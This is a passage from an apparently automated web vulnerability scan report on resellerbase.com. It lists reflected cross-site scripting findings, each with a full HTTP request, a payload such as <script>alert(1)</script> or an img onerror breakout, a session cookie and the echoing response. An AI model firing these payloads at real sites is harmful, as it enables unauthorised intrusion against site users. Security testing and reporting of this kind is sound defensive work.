Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/googlepr.php105e7<script>alert(1)</script>91992e35add was not found on this server.</p>
...[SNIP]...

2.4966. http://www.resellerbase.com/web-service/domain-names/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload f7eee<a>92ad28955c was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/googlepr.php?link_id=4f7eee<a>92ad28955c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/googlepr.php?link_id=4f7eee<a>92ad28955c was not found on this server.</p>
...[SNIP]...

2.4967. http://www.resellerbase.com/web-service/domain-names/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41f08<script>alert(1)</script>5f47ac5054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/googlepr.php?41f08<script>alert(1)</script>5f47ac5054=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/googlepr.php?41f08<script>alert(1)</script>5f47ac5054=1 was not found on this server.</p>
...[SNIP]...

2.4968. http://www.resellerbase.com/web-service/domain-names/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d2de<script>alert(1)</script>66664acc750 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3d2de<script>alert(1)</script>66664acc750/domain-names/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3d2de<script>alert(1)</script>66664acc750/domain-names/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4969. http://www.resellerbase.com/web-service/domain-names/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9412<script>alert(1)</script>8e6ecf99827 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namesa9412<script>alert(1)</script>8e6ecf99827/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namesa9412<script>alert(1)</script>8e6ecf99827/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4970. http://www.resellerbase.com/web-service/domain-names/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f47a<script>alert(1)</script>aacd57cfc80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/search.php8f47a<script>alert(1)</script>aacd57cfc80?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php8f47a<script>alert(1)</script>aacd57cfc80?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4971. http://www.resellerbase.com/web-service/domain-names/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload dc8aa<a>a762a0965bc was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/search.php?keyword=search...&Submit3=Searchdc8aa<a>a762a0965bc&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...&Submit3=Searchdc8aa<a>a762a0965bc&opt=2 was not found on this server.</p>
...[SNIP]...

2.4972. http://www.resellerbase.com/web-service/domain-names/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17df1"><img%20src%3da%20onerror%3dalert(1)>1e382ea9088 was submitted in the cat parameter. This input was echoed as 17df1\"><img src=a onerror=alert(1)>1e382ea9088 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web-service/domain-names/search.php?cat=117df1"><img%20src%3da%20onerror%3dalert(1)>1e382ea9088&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=117df1\"><img src=a onerror=alert(1)>1e382ea9088">
...[SNIP]...

2.4973. http://www.resellerbase.com/web-service/domain-names/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8940a"><img%20src%3da%20onerror%3dalert(1)>200aed4e09e9f942a was submitted in the cat parameter. This input was echoed as 8940a\"><img src=a onerror=alert(1)>200aed4e09e9f942a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/domain-names/search.php?cat=18940a"><img%20src%3da%20onerror%3dalert(1)>200aed4e09e9f942a&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=18940a\"><img src=a onerror=alert(1)>200aed4e09e9f942a">
...[SNIP]...

2.4974. http://www.resellerbase.com/web-service/domain-names/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ea27b<a>22beed701c8 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/search.php?keyword=search...ea27b<a>22beed701c8&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...ea27b<a>22beed701c8&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4975. http://www.resellerbase.com/web-service/domain-names/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c9ff6<script>alert(1)</script>6b894a2004d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2&c9ff6<script>alert(1)</script>6b894a2004d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2&c9ff6<script>alert(1)</script>6b894a2004d=1 was not found on this server.</p>
...[SNIP]...

2.4976. http://www.resellerbase.com/web-service/domain-names/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e178b<a>a87bfa1877c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2e178b<a>a87bfa1877c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2e178b<a>a87bfa1877c was not found on this server.</p>
...[SNIP]...

2.4977. http://www.resellerbase.com/web-service/domain-names/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eeee0<script>alert(1)</script>3df1dc72a74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceeeee0<script>alert(1)</script>3df1dc72a74/domain-names/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceeeee0<script>alert(1)</script>3df1dc72a74/domain-names/themes/ was not found on this server.</p>
...[SNIP]...

2.4978. http://www.resellerbase.com/web-service/domain-names/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cdbd9<script>alert(1)</script>084ab662bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namescdbd9<script>alert(1)</script>084ab662bb9/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namescdbd9<script>alert(1)</script>084ab662bb9/themes/ was not found on this server.</p>
...[SNIP]...

2.4979. http://www.resellerbase.com/web-service/domain-names/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c6a5a<script>alert(1)</script>422cc67544 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesc6a5a<script>alert(1)</script>422cc67544/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesc6a5a<script>alert(1)</script>422cc67544/ was not found on this server.</p>
...[SNIP]...

2.4980. http://www.resellerbase.com/web-service/domain-names/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b407<script>alert(1)</script>3389a6f984c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/?3b407<script>alert(1)</script>3389a6f984c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/?3b407<script>alert(1)</script>3389a6f984c=1 was not found on this server.</p>
...[SNIP]...

2.4981. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64ac2<script>alert(1)</script>215a7dd0695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service64ac2<script>alert(1)</script>215a7dd0695/domain-names/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service64ac2<script>alert(1)</script>215a7dd0695/domain-names/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4982. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a029<script>alert(1)</script>d64433776cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names1a029<script>alert(1)</script>d64433776cf/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names1a029<script>alert(1)</script>d64433776cf/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4983. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 89d57<script>alert(1)</script>a8bb4890495 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes89d57<script>alert(1)</script>a8bb4890495/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

